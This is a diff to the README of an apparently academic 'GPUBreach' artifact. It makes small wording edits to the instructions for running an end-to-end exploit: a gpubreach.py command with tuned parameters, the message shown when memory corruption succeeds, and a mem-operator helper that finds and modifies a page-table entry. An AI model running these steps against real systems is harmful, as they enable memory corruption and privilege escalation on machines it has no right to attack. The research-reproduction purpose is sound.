bane-stealthium/gpubreach/README.md

 Now you are ready to move on to Step 4.

-#### Case 2: If you want to do the end-to-end exploit
+##### Case 2: If you want to do the end-to-end exploit

 First execute the GPUBreach program design for CPU-side exploit:
 ```bash
 python3 gpubreach.py app_cpu_exploit --n_step1 24109 --n_step3 24070 -t 0.2 -s 15
 ```

-When corruption is successful, the program will pause and you will see text like so:
+When corruption is successful, the program will pause and you will see the following text:
 ```text
 (Stable Primitive Ready) Start mem_operator now.
 It should load its page with 0x6464646464646464.
 Press Enter Key to start finding and modifying that page's PTE.
 ```

-As instructed, on another terminal, you will execute:
+On another terminal, please execute:
 ```bash
 ./mem-operator/mem-operator ./d_pattern.bin
 ```